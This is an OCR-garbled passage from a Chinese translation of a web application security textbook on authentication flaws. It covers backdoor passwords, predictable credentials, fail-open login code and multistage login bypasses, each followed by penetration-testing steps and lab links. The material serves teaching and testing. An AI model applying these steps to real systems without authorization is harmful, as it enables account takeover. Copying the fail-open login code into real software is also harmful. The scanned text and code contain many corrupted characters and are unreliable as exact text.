前 所 使 用 的 账户 的 cookie。 攻 击 者 可 以 修改 这 个 值 ， 不 需 验证 即 可 通过 
其 他 用 户 的 账户 访问 应 用 程序 ， 如 图 6-7 所 示 。 
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口 如 果 应 用 程序 允许 管理 用 户 被 伪装 ， 那 么 伪装 逻辑 中 存在 的 任何 
缺陷 都 可 能 导致 垂直 权限 提升 漏洞 。 攻 击 者 不 仅 可 以 访问 其 他 普通 用 户 
的 数据 ， 甚 至 可 以 完全 控制 应 用 程序 。 

口 攻 种 伪装 功能 能 够 以 简单 “< 后门? 密码 的 形式 执行 ， 该 密码 可 和 任 
何 用 户 名 一 起 同 标 准 登录 页 面 提交 ， 以 作为 该 用 尸 进行 验证 。 由 于 许多 
原因 ， 这 种 设计 非常 危险 ， 但 攻击 者 所 获得 的 最 大 好 处 是 : 他 们 可 在 实 
施 标准 攻击 “如 对 登录 机 制 进行 蛮 力 攻击 ) 的 过 程 中 发 现 这 个 密码 。 如 
果 后 门 密码 在 用 户 的 真实 密码 前 得 到 匹配 ， 那 么 攻击 者 就 可 能 发 现 后 门 
密码 功能 ， 从 而 访问 每 一 名 用 户 的 账户 。 同 样 ， 一 次 蛋 力 攻击 可 能 导致 
两 个 不 同 的 “ 触 点 >”， 因 而 揭示 后 门 密码 ， 如 几 6-8 所 示 。 





















































Seem 

HTTP/ 1.1 302 Found 

Connection: close 

Date: Thu, 10 Feb 2011 17:37:14 GMT 

Server: Microsoft-1I1S/£.0 
HicrosoltOfficeWebServer: $.0 Pub 

X-Powered-By: ASP.NET 

X-AspNet-Version: 2.0.50727 

Location: /auth/290/Home.ashx ?AdminOverr ide=crue 
Set-Cookie: Sessionld=iFSBE452 ADEAIALOASCERSCEDSS7AFAA; secure; 
HttpOnly 

Cache-Control: no-cache 

Pragma: no-cache 








密码 猜测 攻击 出 现 两 个 " 触 点 ”"， 说 明 应 用 程序 使 用 后 门 密码 


X 


渗透 测试 步 又 


(1) 确定 应 用 程序 中 的 所 有 伪装 功能 。 即 使 公布 的 内 容 中 没 
有 明确 的 伪装 功能 链接 ， 应 用 程序 仍然 可 能 实施 这 种 功能 请 参阅 
第 4 章 了 解 相关 内 容 ) 。 

(2) 演 试 使 用 伪 闭 功能 直接 伪装 成 其 他 用 户 。 

(3) 设法 操纵 任何 由 伪装 功能 处 理 的 用 户 提交 的 数据 ， 答 试 
aa o FEA A EE AA] AN EE E Se ECA P44 K 
情况 。 

(4) 如 果 能 够 成 功利 用 伪装 功能 ， 答 试 伪 效 成 任何 已 知 的 或 
猜测 出 的 管理 用 户 ， 以 提升 用 户 权 限 。 

(5) 实施 密码 猜测 攻击 《请 参阅 6.2.3 节 ) 时 ， 碍 明 是 否 有 用 
户 使 用 多 个 有 效 密码 ， 或 者 某 个 特殊 的 密码 是 人 否 与 几 个 用 户 名 匹 
配 。 妨 外 ， 用 在 蛋 力 攻击 中 获得 的 证 书 以 许多 不 同 的 用 户 登 录 ， 检 
但是 否 一 切 正 第 。 特 别 注意 任何 “以 X 登 录 ” 的 状态 消 居 。 








A yn.) 

笑 试 访问 
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6.2.9 ”证 书 确认 不 完善 


精心 设计 的 验证 机 制 强制 要 求 密码 满足 各 种 要 求 ， 如 最 小 密码 长 度 
和 同时 使 用 大 小 写字 符 。 相 应 地 ， 一 些 设计 不 佳 的 验证 机 制 不 仅 没 有 强 
制 执行 这 些 最 佳 实践 ， 而 且 对 用 户 遵 守 这 些 要 求 的 愿望 置之不理 。 

例如 ， 一 些 应 用 程序 截 短 密码 ， 只 确认 前 n 个 字符 ， 一 些 应 用 程序 
并 不 对 密码 进行 大 小 写 检查 ;， 一 些 应 用 程序 在 检查 密码 之 前 删除 不 第 用 
的 字符 (有 时 以 执行 输入 确认 为 借口 》。 最 近 ， 一 些 相 当 有 名 的 应 用 程 
序 部 外 确认 具有 此 类 行为 一 些 好 奇 用 户 的 试验 和 错误 致使 人 们 发 现 了 
这 一 问题 。 

以 上 这 些 密 码 确认 限制 可 显著 减少 可 能 的 密码 数量 。 通 过 实验 ， 渗 
透 测试 员 可 以 判定 一 个 密码 是 否 得 到 完全 确认 ， 或 者 某 个 限制 是 否 
效 。 然 后 就 可 以 针对 登录 机 制 的 目 动 攻击 方法 进行 调整 ， 删 除 不 必要 的 
测试 ， 大 量 减 少 攻 破 用 户 账 户 所 需 提交 的 请 求 的 数量 。 




















渗透 测试 步 又 


(1) 使 用 一 个 现 有 的 账户 ， 尝 试用 密码 的 各 种 变化 形式 进行 
登录 : 删除 最 后 一 个 人 字符、 改变 字符 大 小 写 、 删 除 任 何 特殊 排版 的 
字符 。 如 果 其 中 一 些 和 尝试 取得 成 功 ， 继 续 实 验 过 程 ， 答 试 了 解 完整 
的 证 书 确 认 过 程 。 

(2) 利用 得 到 的 所 有 结果 调整 自动 密码 猜测 攻击 ， 删 除 多 余 
的 测试 ， 提 高 成 功 的 几率 。 








尝试 访问 
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6.2.10 E— VERA 


一 些 文 持 目 我 注册 的 应 用 程序 允许 用 户 指 定 他 们 目 己 的 用 户 名 ， 而 
且 并 不 强制 要 求 用 户 使 用 唯一 的 用 户 名 。 虽 然 这 种 应 用 程序 极其 少见 ， 
但 我 们 还 是 见 到 过 知 干 这 类 应 用 程序 。 

由 于 两 方面 的 原因 ， 这 种 设计 存在 一 些 缺 陷 。 

口 在 注册 阶段 或 随后 修改 密码 的 过 程 中 ， 共 至 同一 个 用 户 名 的 两 个 
用 户 可 能 碰巧 选择 相同 的 密码 。 如 果 出 现 这 种 情况 ， 应 用 程序 要 么 拒绝 
第 二 名 有 用户 选择 的 密码 ， 要 么 多 许 两 个 账户 使 用 相同 的 证 书 。 如 采 属 于 
前 者 ， 应 用 程序 将 会 同一 名 用 户 泄 露 男 一 名 用 户 的 证 书 ;， 如 果 属 于 后 
者 ， 其 中 一 名 用 户 登录 后 会 访问 男 一 名 用 户 的 账户 。 

口 即使 由 于 登录 失败 尝试 次 数 方面 的 限制 ， 在 其 他 地 方 不 可 能 实施 
这 种 攻击 ， 攻 击 者 仍然 可 以 利用 这 种 行为 成 功 实 施 蛮 力 攻击 。 攻 击 者 可 
以 使 用 不 同 的 密码 ， 多 次 用 一 个 特殊 的 用 户 名 注册 ， 同 时 监控 说 明 使 用 
该 用 户 名 和 密码 的 账户 已 经 存在 的 不 同 啊 应 。 攻 击 者 不 需 以 目标 用 户 进 
行 任何 一 次 登录 尝试 ， 即 可 获取 该 用 户 的 密码 。 

设计 存在 缺陷 的 自我 注册 功能 还 可 能 造成 用 户 枚 举 漏洞 。 如 果 应 用 
程序 禁止 使 用 相同 的 用 户 名 ， 那 么 攻击 者 可 以 注册 大 量 第 见 的 用 户 名 ， 
从 而 确定 但 到 拒绝 的 现 有 用 户 名 。 











渗透 测试 步 又 


(1) 如 果 应 用 程序 允许 自我 注册 ， 尝 试用 不 同 的 密码 两 次 注 
册 同 一 个 用 户 名 。 

(2) 如 果 应 用 程序 阻止 第 二 次 注册 企图 ， 也 可 以 利用 这 种 行 
为 枚 举 现 有 的 用 户 名 ， 虽 然 在 主 登录 页 面 或 其 他 地 方 不 可 能 这 样 
做 。 用 一 组 第 见 的 用 户 名 进行 多 次 注册 答 试 ， 设 法 确定 被 应 用 程序 
阻止 的 已 注册 用 户 名 。 

(3) 如 果 可 成 功 注册 完全 相同 的 用 户 名 ， 尝 试用 相同 的 密码 
注册 两 个 相同 的 用 户 名 ， 以 此 确定 应 用 程序 的 行为 。 

Ca) 如 果 以 上 做 法 得 到 错误 消息 ， 也 可 以 利用 这 种 行为 
实施 一 次 查 力 攻击 ， 虽 然 在 主 登 录 页 面 不 可 能 实施 这 种 攻击 。 
针对 一 个 枚 举 或 猜测 出 的 用 户 名 发 动 攻 击 ， 尝 试用 一 组 第 用 密 
码 多 次 注册 这 个 用 户 名 。 如 果 应 用 程序 拒绝 茶 个 特殊 的 密码 ， 
就 可 以 发 现 目标 账户 的 现 有 密码 。 

D 如 果 没 有 得 到 错误 消息 ， 使 用 指定 的 证 书 登 录 ， 看 
看 出 现 什么 结果 。 可 能 需要 注册 几 个 用 户 ， 修 改 每 个 账户 保存 
TARA o 





6.2.11 可 预测 的 用 户 名 


一 些 应 用 程序 根据 某 种 可 以 预测 的 顺序 (如 cust5331、cust5332) 
自动 生成 账户 用 户 名 。 如 果 应 用 程序 以 这 种 方式 运转 ， 弄 清 了 用 户 名 顺 
序 的 攻击 者 就 可 以 很 快 获得 全 部 有 效用 户 名 ， 以 此 作为 后 续 攻 击 的 基 
础 。 与 依赖 不 断 提交 由 词汇 驱动 请 求 的 枚 举 方法 不 同 ， 这 种 确定 用 户 名 
的 方法 不 需 实施 入 侵 ， 也 很 少 给 应 用 程序 造成 干扰 。 








渗透 测试 步 又 


(1) 如 果 用 户 名 由 应 用 程序 生成 ， 设 法 获得 几 个 连续 的 用 户 
名 ， 看 能 否 从 中 看 出 任何 顺序 或 模式 。 

(2) 如 果 存 在 某 种 顺序 或 模式 ， 向 后 推断 列 出 所 有 可 能 的 有 
效用 户 名 。 这 种 方法 可 作为 需要 有 效用 户 名 的 登录 亦 力 攻击 和 其 他 
攻击 的 基础 ， 如 利用 访问 控制 漏洞 “请 参阅 第 8 章 了 解 相关 入 
容 ) 。 


























尝试 访问 


http://mdsec.net/auth/169/ 


6.2.12 ”可 预测 的 初始 密 三 





一 些 应 用 程序 一 次 性 或 大 批量 创建 用 户 ， 并 上 自动 指定 初始 密码 ， 然 
后 以 某 种 方式 将 密码 分 配给 所 有 用 户 。 这 种 生成 密码 的 方式 可 让 攻击 者 
能 够 预测 其 他 应 用 程序 用 户 的 密码 。 基 于 内 联网 的 企业 应 用 程序 常常 存 
在 这 种 漏洞 。 例 如 ， 应 用 程序 为 每 位 雇员 创建 一 个 账户 ， 并 向 其 发 送 一 
份 打印 好 的 密码 通知 。 

如 果 所 有 用 户 收 到 相同 的 密码 ， 或 者 根据 其 用 户 名 或 工作 职能 创建 
的 密码 ， 这 种 密码 最 容易 被 攻破 。 男 外 ， 生 成 的 密码 可 能 包含 条 种 顺 
FE eI i i 





渗透 测试 步 又 


(1) 如 果 密 码 由 应 用 程序 生成 ， 设 法 获得 几 个 连续 的 密码 ， 
看 能 售 从 中 看 出 任何 顺序 或 模式 。 

(2) 如 果 存 在 某 种 顺序 或 模式 ， 根 据 这 种 模式 推 朵 ， 获 取 其 
他 应 用 程序 用 户 的 密码 。 

(3) 如 果 密 码 呈 现 出 一 种 可 能 与 用 户 名 相 联系 的 模式 ， 可 以 
设法 使 用 已 知 或 猜测 出 的 用 户 名 与 相应 推 呆 出 的 密码 进行 登录 。 

(4) 其 他 情况 下 ， 可 以 使 用 推断 出 的 密码 列表 作为 利用 一 组 
枚 举 出 的 用 户 名 或 第 见 用 户 名 实施 蛋 力 攻击 的 基础 。 

















尝试 访问 


http://mdsec.net/auth/172/ 


6.2.13 ”证 书 分 配 不 安 


许多 应 用 程序 并 不 在 用 户 与 应 用 程序 正常 交互 的 过 程 中 分 配 新 建 账 
户 的 证 书 〈 如 通过 邮寄 或 电子 邮件 ) 。 有 时 ， 采 用 这 种 分 配方 式 主要 出 
于 安全 考虑 ， 例 如 ， 确 保 用 户 提供 的 邮寄 或 电子 邮件 地 址 属于 其 本 人 。 

这 种 分 配方 式 有 时 会 带 来 安全 风险 。 例 如 ， 如 果 分 配 证 书 的 邮件 中 
同时 包含 用 户 名 和 密码 ， 没 有 给 邮件 设置 使 用 时 间 限 制 ， 没 有 要 求 用 户 
在 第 一 次 登录 时 修改 密码 ， 那 么 ， 大 多 数 甚至 是 绝 大 部 分 应 用 程序 用 户 
都 不 会 修改 初始 证 书 ， 并 且 将 收 到 的 邮件 保存 很 长 一 段 时 间 ， 而 未 授权 
方 有 可 能 在 此 期 间 访问 这 些 分 配 证 书 的 邮件 。 

有 时 应 用 程序 并 不 分 配 证 书 ， 而 是 传送 一 个 “账户 激活 *?URL， 用 户 
通过 它 设 置 目 己 的 初始 密码 。 如 末 发 送 给 连续 用 户 的 URL 表 现 出 茶 种 顺 
序 ， 攻 击 者 就 可 以 通过 注册 几 个 紧密 相连 的 用 户 确定 这 种 顺序 ， 以 此 推 
断 出 发 送 给 最 近 与 后 续 用 户 的 激活 URL。 

某 些 Web 应 用 程序 表现 的 一 种 相关 行为 是 ， 人 允许 新 用 户 以 看 似 安全 
的 方式 注册 账户 ， 然 后 向 每 个 新 用 户 发 送 一 封包 含 其 完整 的 登录 证 书 的 
欢迎 电子 邮件 。 最 糟糕 的 情况 是 ， 具 有 安全 意识 的 用 尸 决 定 立 即 修改 可 
能 已 被 攻破 的 密码 ， 但 随后 又 收 到 一 封 电子 邮件 ， 其 中 包含 “以 备 日 后 
参考 ”的 新 密码 。 这 种 行为 相当 奇怪 ， 并 且 完 全 没有 必要 ， 因 此 ， 我 们 
强烈 建议 用 户 停止 使 用 表现 出 此 类 行为 的 Web 应 用 程序 。 











渗透 测试 步 又 


(1) 获得 一 个 新 账户 。 如 果 应 用 程序 并 不 要 求 在 注册 阶段 设 
置 所 有 证 书 ， 弄 清 应 用 程序 如 何 向 新 用 户 分 配 证 书 。 

(2) 如 果 应 用 程序 使 用 账户 激活 URL， 设 法 注册 几 个 紧密 相 
连 的 新 账户 ， 确 定 收 到 的 URL 中 的 任何 顺序 。 如 果 确 定 某 种 模式 ， 
尝试 预测 应 用 程序 发 送 给 最 近 与 后 续 用 户 的 激活 URL， 尝 试 使 用 这 
些 URL 占 有 他 们 的 账户 。 

(3) 尝试 多 次 重复 使 用 同一 个 激活 URL， 看 看 应 用 程序 是 否 
允许 这 样 做 。 如 果 遭 到 拒绝 ， 尝 试 在 重复 使 用 URL 之 前 锁定 目标 账 
户 ， 看 看 现在 这 种 方法 是 否 可 行 。 








6.3 i 执行 缺陷 


由 于 在 执行 过 程 中 存在 错误 ， 即 使 精心 设计 的 验证 机 制 也 可 能 非常 
不 安全 。 这 些 错 误 可 能 导致 信息 泄露 、 完 全 避 开 登录 ， 或 者 使 验证 机 制 
的 总 体 安全 弱化 。 与 保密 性 不 强 的 密码 和 可 被 蛋 力 攻击 之 类 的 设计 缺陷 
相 比 ， 执 行 缺陷 往往 更 加 细微 ， 更 难以 发 现 。 由 于 大 量 威胁 模型 和 渗透 
测试 可 能 已 经 发 现 了 最 为 注重 安全 的 应 用 程序 中 的 任何 明显 的 执行 缺 
陷 ， 针 对 这 类 缺陷 实施 攻击 通常 会 取得 更 大 的 成 果 。 我 们 半 在 某 大 型 银 
行 所 采用 的 Web 应 用 程序 中 发 现 以 下 所 述 的 执行 缺陷 。 


6.3.1 故障 开放 登 | 


故障 开放 人 逻辑 是 一 种 逻辑 缺陷 (将 在 第 11 章 详细 描述 ) ， 如 果 验 证 
机 制 中 出 现 这 种 缺陷 ， 就 会 造成 十 分 严重 的 后 果 。 

下 面 是 一 个 精心 设计 的 故障 开放 登录 机 制 实 例 。 如 果 由 于 某 种 原 
因 ， 调 用 db.getUser O 产生 异常 (例如 ， 因 为 用 户 的 请 求 中 没有 用 户 
名 或 密码 参数 而 出 现 空 指针 异常 )， 用 户 仍然 可 以 成 功 登 录 。 虽 然 产生 
的 会 话 可 能 并 不 属于 某 个 特殊 的 用 户 ， 因 此 无 法 执行 其 全 部 功能 ， 但 攻 
击 者 仍然 可 以 通过 这 种 方法 访问 一 些 敏感 数据 或 功能 。 


public Response checkLogin(Sessicn session) { 

















try { 
String uname = session.getParameter ("username"); 
String passwd = session.getParameter ("password"); 


User user = db.getUser(uname, passwd); 

LE (user == null) { 
/1 无 歼 证 书 
session.setMessage{"Login failed. "); 
return doLogin (session); 


} 


catch (Exception e) {} 


// 有 效用 户 
session.setMessage{"Login successful. "); 
return doMainMenu(session}; 

} 


实际 上 ， 我 们 不 能 指望 这 样 的 代码 通过 即使 是 最 简单 的 安全 审查 。 
但 是 ， 在 更 复杂 的 机 制 中 很 可 能 存在 概念 相同 的 缺陷 。 这 些 机 制 会 产生 
大 量 分 层 方式 调用 ， 可 能 会 出 现 许 多 潜在 的 错误 并 在 不 同 的 位 置 对 它们 
进行 处 理 ， 其 中 更 复杂 的 确认 逻辑 可 能 需要 维护 重要 的 登录 进展 状态 。 





渗透 测试 步 又 


(1) 使 用 控制 的 一 个 账户 执行 一 次 完整 、 有 效 的 登录 。 使 用 
拦截 代理 服务 器 记录 提交 的 每 一 份 数 据 、 收 到 的 每 一 个 啊 应 。 
(2) 多 次 重复 登录 过 程 ， 以 非常 规 方式 修改 提交 的 数据 。 例 
如 ， 对 于 客户 端 传 送 的 每 个 请 求 参数 或 cookie: 
(a) 提交 一 个 空子 符 串 值 ; 
Cb) 完全 删除 名 / 值 对 ; 
(Cc) 提交 非常 长 和 非常 短 的 值 ; 
D 提交 字符 串 代 苦 数 字 或 相反 
Ce) 以 相同 和 不 同 的 值 ， 多 次 提交 同一 个 数据 项 。 
C3) 仔细 检查 应 用 程序 对 提交 的 每 个 畸形 请 求 的 啊 应 ， 确 定 
任何 不 同 于 基本 情况 的 差异 。 
(4) 根据 这 些 观察 结果 调整 测试 过 程 。 如 果 系 个 修改 造成 行 
为 改变 ， 设 法 将 这 个 修改 与 其 他 更 改组 合 在 一 起 ， 使 应 用 程序 的 逻 
辑 达到 最 大 限度 。 














尝试 访问 


http://mdsec.net/auth/300/ 


6.3.2 介 段 登 3 | Tik Kea 
一 些 应 用 程序 使 用 精心 设计 的 多 阶段 登录 机 制 ， 例 如 : 
口 输入 用 户 名 和 密码 ; 





口 啊 应 一 个 质询 ， 答 案 是 PIN 中 的 特殊 数字 或 一 个 值得 纪念 的 词 ; 

口 提 交 在 不 断 变 化 的 物理 令 牌 上 显示 的 某 个 值 。 

多 阶段 登录 机 制 旨 在 提高 基于 用 户 名 和 窗 码 的 简单 登录 模型 的 安全 
性 。 通 肖 ， 多 阶段 登录 机 制 首 先 要 求 用 户 通 过 用 户 名 或 类 似 数 据 项 确认 
目 己 的 身份 ;， 随后， 登录 阶段 再 执行 各 种 验证 检查 。 这 种 机 制 利 利 存 在 
安全 漏洞 ， 特 别 是 各 种 逻辑 缺 隐 《请 参阅 第 11 章 了 解 相关 内 容 ) 。 











kegs Heese 
密码 验证 的 安全 漏洞 更 少 ， 这 种 看 法 是 错误 的 。 执 行 多 次 验证 检查 
可 能 会 显著 提高 登录 机 制 的 安全 性 。 但 相应 地 ， 这 个 过 程 也 存在 更 
多 的 执行 缺陷 。 如 果 一 个 多 阶段 登录 机 制 存 在 多 个 执行 缺陷 ， 它 其 
至 还 没有 基于 用 户 名 和 密码 的 正常 登录 安全 。 


在 执行 过 程 中 ， 一 些 多 阶段 登录 机 制 对 用 户 与 早先 阶段 的 交互 做 出 
潜在 不 安全 的 假设 ， 如 下 所 示 。 

O 应 用 程序 可 能 认为 访问 第 三 阶段 的 用 户 已 经 完成 第 一 、 二 阶段 的 
验证 。 因 此 ， 它 可 能 允许 直接 由 第 一 阶段 进入 第 三 阶段 并 且 提 供 正确 证 
书 的 攻击 者 通过 验证 ， 使 仅 拥 有 部 分 正常 登录 所 雷 的 各 种 证 书 的 攻击 者 
能 够 成 功 登录 。 

口 应 用 程序 可 能 会 信任 由 第 二 阶段 处 理 的 一 些 数据 ， 因 为 这 些 数据 
己 经 在 第 一 阶段 得 到 确认 。 但 是 ， 攻 击 者 能 够 在 第 二 阶段 操控 这 些 数 








据 ， 提 供 一 个 不 同 于 第 一 阶段 的 值 。 例 如 ， 在 第 一 阶段 ， 应 用 程序 会 判 
定 用 户 的 账户 是 人 否 已 经 过 期 、 被 锁定 或 者 属于 管理 用 户 ， 或 者 是 售 需 要 
完成 第 二 阶段 以 外 的 其 他 登录 阶段 。 如 果 攻 击 者 能 在 不 同 登录 阶段 的 转 
换 过 程 中 干扰 这 些 标记 ， 他 们 惑 可 以 更 改 应 用 程序 的 行为 ， 让 他 们 只 需 
部 分 证 书 即 可 通过 验证 ， 或 者 提升 其 权限 。 

口 应 用 程序 可 能 认为 每 个 阶段 的 用 户 吴 份 不 会 及 生 变化 ， 因 此 ， 息 
并 不 在 每 个 阶段 明确 确认 用 户 身 份 。 例 如 ， 第 一 阶段 可 能 需要 提交 一 个 
有 效 的 用 户 名 和 和 密码， 第 二 阶段 需要 重新 提交 用 户 名 (此 时 保存 在 隐藏 
表单 字段 中 ) 和 不 断 变 化 的 物理 令 牌 上 的 一 个 值 。 如 果 攻 击 者 在 每 个 阶 
段 提交 有 效 的 数据 对 ， 但 这 些 数据 属于 两 个 不 同 的 用 户 ， 那 么 应 用 程序 
可 能 会 允许 该 用 户 通过 验证 ， 认 为 他 是 两 名 用 户 中 的 任意 一 名 用 户 。 这 
就 允许 拥有 上 自己 物理 令 牌 并 发 现 其 他 用 户 密 码 的 攻击 者 能 够 以 该 用 户 的 
APSR ORIN) 。 虽 然 不 对 其 他 信息 加 以 利用 ， 攻 击 者 无 法 完全 
攻破 登录 机 制 ， 但 它 的 总 体 安 全 状态 已 严重 削弱 ， 应 用 程序 为 执行 二 元 
机 制 所 投入 的 大 量 开支 和 努力 并 未 取得 预期 的 效果 。 























渗透 测试 步 又 


(1) 使 用 控制 的 一 个 账户 执行 一 次 完整 、 有 效 的 登录 。 使 用 
拦截 代理 服务 器 记录 回应 用 程序 提交 的 每 一 份 数据 。 

(2) 确定 各 个 不 同 登 录 阶 段 以 及 在 每 个 阶段 收集 到 的 数据 。 
确定 是 否 不 止 一 次 收 到 某 条 信息 ， 或 者 是 否 有 信息 被 返回 给 客户 
端 ， 并 通过 隐藏 表单 字段 、cookie 或 者 预先 设置 的 URL 参 数 重新 提 
区 《请 参阅 第 5 章 了 解 相 关内 容 ) 。 

(3) 使 用 各 种 畸形 请 求 多 次 重复 登录 过 程 : 

Ca) 莹 试 按 不 同 的 顺序 完成 登录 步骤 ; 

(b)〉 尝 试 直 接 进 入 任何 特定 的 阶段 ， 从 那里 继续 登录 ; 

Co) 和 尝试 省 略 每 个 阶段 并 从 下 一 阶段 继续 登录 ; 

O 运用 想象 力 ， 想 出 其 他 开发 者 无 法 预料 的 方式 访问 
不 同 的 登录 阶段 。 

(4) 如 果 有 数据 不 止 提 交 一 次 ， 尝 试 在 男 一 个 阶段 提交 一 个 
不 同 的 值 ， 看 看 是 否 仍然 能 够 成 功 登 录 。 有 些 提交 数据 可 能 是 多 余 
的 ， 实 际 上 并 不 由 应 用 程序 处 理 。 有 些 数据 在 某 个 阶段 得 到 确认 ， 
随后 就 被 应 用 程序 所 信任 。 在 这 种 情况 下 ， 尝 试 在 一 个 阶段 提供 一 
名 用 户 的 证 书 ， 然 后 在 下 一 阶段 转换 成 由 男 一 名 用 户 进 行 验证 。 应 
用 程序 可 能 在 几 个 阶段 都 对 同一 个 数据 进行 确认 ， 但 执行 不 同 的 检 
查 。 在 这 种 情况 下 ， 演 试 在 第 一 个 阶段 提供 例如) 一 名 用 户 的 用 
4 和 密码 ， 然 后 在 第 二 个 阶段 提供 另 一 名 用 户 的 用 户 名 和 PIN 扎 

C5) 特别 注意 任何 通过 客户 端 传送 、 并 不 由 用 户 直接 输入 的 
数据 。 应 用 程序 可 能 使 用 它们 保存 登录 进展 状态 信息 ， 并 且 信 任 这 
些 数据 。 例 如 ， 如 果 第 三 个 阶段 的 请 求 中 包含 参数 
stage2complete=true， 那 么 攻击 者 就 可 以 通过 设置 这 个 值 直接 进入 
第 三 个 阶段 。 答 试 修改 应 用 程序 提交 的 值 ， 确 定 是 人 否 可 以 使 用 这 种 
方法 进入 或 省 略 登录 阶段 。 












































ALL yn vw) 

笑 试 访问 
http://mdsec.net/auth/195/ 
http://mdsec.net/auth/199/ 
http://mdsec.net/auth/203/ 


http://mdsec.net/auth/206/ 
http://mdsec.net/auth/211/ 


一 些 登 录 机 制 在 其 中 一 个 登录 阶段 提出 一 个 随机 变化 的 问题 。 例 
如 ， 提 交 用 户 名 和 密码 后 ， 应 用 程序 会 癌 用 户 提 出 许多 “机 密 ? 问 题 中 的 
一 个 (关于 用 户 母 亲 的 女 家 姓 、 出 生地 、 小 学 名 称 等 ) ， 或 者 要 求 其 提 
交 一 个 机 密 短 语 中 的 两 个 随机 字母 。 采 用 这 种 做 法 的 基本 原理 在 于 : 即 
使 攻击 者 截获 了 用 户 在 茶 个 时 候 输 入 的 全 部 信息 ， 他 也 无 法 在 其 他 时 刻 
作为 该 用 户 登 录 ， 因 为 这 时 应 用 程序 将 提出 不 同 的 问题 。 

在 茶 些 执行 过 程 中 ， 这 种 功能 会 但 到 破坏 ， 因 而 无 法 实现 其 目的 。 

O 应 用 程序 可 能 会 提出 一 个 随机 选择 的 问题 ， 把 有 关 问 题 的 细节 保 
存在 隐藏 的 HTML 表 单字 段 中 ， 而 不 是 服务 右上。 随后 用 户 提交 该 问题 
及 其 答案 。 这 样 ， 攻 击 者 就 能 够 选择 回答 哪个 问题 ， 允 许 他 们 截获 用 户 
在 茶 个 时 候 的 输入 后 ， 重 复 使 用 截获 的 信息 进行 登录 。 

口 应 用 程序 可 能 会 对 每 个 登录 尝试 提出 一 个 随机 选择 的 问题 ， 但 如 
果 某 个 用 户 无 法 回答 该 问题 ， 它 并 不 记 住 同 该 用 户 提 出 了 什么 问题 。 如 
果 该 用 户 稍 后 义 提交 一 次 登录 尝试 ， 应 用 程序 又 生成 男 一 个 随机 问题 。 
这 允许 攻击 者 届 历 所 有 问题 ， 直 到 收 到 他 们 知道 答案 的 那个 问题 ， 从 而 
利用 在 茶 个 时 候 截 获 的 用 户 和 输入 重复 进行 登录 。 
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> 注解 上 面 的 第 二 种 情况 确实 相当 微妙 ， 因 此 ， 许 多 现实 
中 的 应 用 程序 都 易于 受到 攻击 。 初 看 上 去 ， 要 求 用 户 回 答 一 个 值得 
纪念 的 词 中 的 两 个 字母 的 应 用 程序 似乎 能 够 正常 运转 ， 增 强 登录 机 
制 的 安全 。 但 是 ， 如 果 每 次 在 通过 前 一 个 验证 阶段 后 随机 选择 两 个 
字母 ， 那 么 截获 用 户 在 茶 个 时 候 的 登录 信息 的 攻击 者 只 需 重 复 进 入 
这 个 验证 阶段 ， 下 到 应 用 程序 要 求 提 交 他 知道 的 两 个 字母 为 止 ， 这 











样 做 也 不 存在 任何 账户 锁定 风险 。 


渗透 测试 步 又 


(1) 如 果 一 个 登录 阶段 使 用 一 个 随机 变化 的 问题 ， 确 定 问题 
本 号 是 否 和 回答 一 起 提交 。 如 有 果 是 这 样 ， 改 变 这 个 问题 并 提交 正确 
答案 ， 看 看 是 否 仍然 能 够 成 功 登录 。 

D 如果 应 用 程序 并 不 允许 攻击 者 提交 任意 问题 和 答案 ， 用 
同一 个 账户 进行 部 分 登录 ， 每 次 进行 到 出 现 不 同 的 问题 为 止 。 如 果 
每 次 都 出 现 不 同 的 问题 ， 那 么 攻击 者 仍然 能 够 选择 回答 哪个 问题 。 





A yn.) 

笑 试 访问 
http://mdsec.net/auth/178/ 
http://mdsec.net/auth/182/ 
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=> 注解 在 一 些 登 录 组 件 随机 变化 的 应 用 程序 中 ， 应 用 程序 
在 一 个 阶段 收集 用 户 的 全 部 证 书 。 例 如 ， 主 登录 页 面 中 可 能 显示 一 
个 表单 ， 其 中 包 售 用户 名 、 密 码 和 一 个 机 密 问 题字 段 ， 且 当 每 次 加 
载 登录 页 面 时 ， 机 密 问 题 都 会 发 生 改 变 。 在 这 种 情况 下 ， 机 密 问 题 
的 随机 性 根本 无 法 阻止 已 经 截获 一 名 用 户 在 某 个 时 候 的 输入 信息 的 
攻击 者 重新 传送 有 效 的 登录 请 求 ， 也 无 法 修改 登录 过 程 以 实现 这 种 
目的 ， 因 为 攻击 者 只 需 重复 加 载 登 录 页 面 ， 直 到 找到 他 知道 答案 的 
问题 。 在 另 一 种 类 似 的 情况 下 ， 应 用 程序 可 能 会 设置 一 个 持久 性 

cookie, “确保 " 辐 特 定 用 户 提 出 相同 的 问题 ， 直 到 该 用 户 正 确 回答 
这 个 问题 。 当 然 ， 攻 击 者 只 需 修改 或 删除 这 个 cookie 束 能 够 轻易 避 
开 这 种 防御 措施 。 














6.3.3 不 安全 的 证 书 存 人 


如 果 应 用 程序 以 不 安全 的 方式 存储 登录 证 书 ， 那 么 ， 即 使 验证 过 程 
本 号 并 不 存在 缺陷 ， 登 录 机 制 的 安全 也 会 被 削弱 。 

Web 应 用 程序 常 妾 以 危险 的 方式 将 用 户 证 书 存储 在 数据 库 中 ， 这 人 包 
括 以 明文 形式 存储 密码 。 但 是 ， 即 使 使 用 MD5 或 SHA-1 等 标准 算法 对 密 
码 进行 散 列 处 理 ， 攻 击 者 仍然 可 以 在 预先 计算 的 散 列 值 数 据 库 中 碍 找 观 
察 到 的 散 列 。 因 为 应 用 程序 使 用 的 数据 库 账 尸 必须 能 够 随时 读 / 写 这 些 
证 书 ， 攻 击 者 可 以 利用 应 用 程序 中 的 许多 其 他 漏洞 访问 这 些 证 书 ， 例 
如 ， 命 令 、SQL 注 入 漏洞 (参阅 第 9 半 ) 或 访问 控制 漏洞 (参阅 第 8 
HH) 。 





尝试 访问 
一 些 在 线 数据 库 的 常见 散 列 函数 可 从 以 下 网 址 查看 : 
http://passcracking.com/index.php 


http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/script- 
hash-md5.php 


渗透 测试 步 又 


D 分 析 应 用 程序 中 所 有 与 验证 有 关 的 功能 以 及 任何 与 用 户 
维护 有 关 的 功能 。 如 果 发 现任 何 癌 客户 端 返回 用 户 密 码 的 情况 ， 即 
表明 应 用 程序 并 未 以 安全 的 方式 保存 密码 ， 或 者 密码 以 明文 方式 呈 
现 ， 或 应 用 程序 使 用 了 可 还 原 加 密 形式 保存 密码 。 

D 如 果 发 现 应 用 程序 中 存在 任何 一 种 任意 命令 或 全 询 执 行 
